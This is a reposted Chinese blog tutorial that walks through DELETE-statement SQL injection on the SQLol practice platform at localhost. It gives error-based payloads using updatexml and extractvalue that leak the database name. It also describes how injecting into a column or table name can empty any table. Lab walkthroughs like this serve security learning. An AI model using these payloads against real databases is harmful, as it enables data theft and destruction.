首页 > 数据库技术 > 详细

SQL注入测试平台 SQLol -5.DELETE注入测试

时间:2016-05-26 21:45:23      阅读:228      评论:0      收藏:0      [点我收藏+]

  访问首页的delete模块,http://127.0.0.1/sql/delete.php,开始对delete模块进行测试。

delete语法:

DELETE FROM 【users】 WHERE 【username】 = 【‘1‘】

  

几个位置都可能存在注入,这里只演示一种。

下面演示注入到不同位置的方法。

 

一、String in WHERE clause

构造POC:

‘ or updatexml(1,concat(0x7e,(database()),0x7e),0) or ‘

获取数据库

技术分享


二、Integer in WHERE clause

构造POC:

‘‘ or extractvalue(1,concat(0x7e,database())) or ‘‘

获取数据库

技术分享


三、Column Name

注入点在【1】处

DELETE FROM users WHERE 【1】 = 1 

利用方式:

1、清空users表

2、构造报错注入语句

 


四、Table Name

注入点在【1】处

DELETE FROM 1 WHERE isadmin = 0 

利用方式:

1、清空任意表

2、构造报错,爆出数据

 

SQL注入测试平台 SQLol -5.DELETE注入测试

原文:http://www.cnblogs.com/xiaozi/p/5532657.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!